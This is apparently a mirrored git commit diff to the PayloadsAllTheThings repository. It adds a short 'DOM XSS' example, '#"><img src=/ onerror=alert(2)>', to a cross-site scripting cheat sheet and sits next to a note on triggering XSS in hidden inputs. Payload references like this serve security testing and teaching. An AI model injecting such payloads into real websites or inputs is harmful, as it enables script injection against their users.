mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 06:53:04 -08:00
Enumeration added and improvement for CRLF/XSS/SQL
This commit is contained in:
@@ -83,6 +83,11 @@ XSS in Hidden input
|
||||
Use CTRL+SHIFT+X to trigger the onclick event
|
||||
```
|
||||
|
||||
DOM XSS
|
||||
```
|
||||
#"><img src=/ onerror=alert(2)>
|
||||
```
|
||||
|
||||
## XSS in wrappers javascript and data
|
||||
XSS with javascript:
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user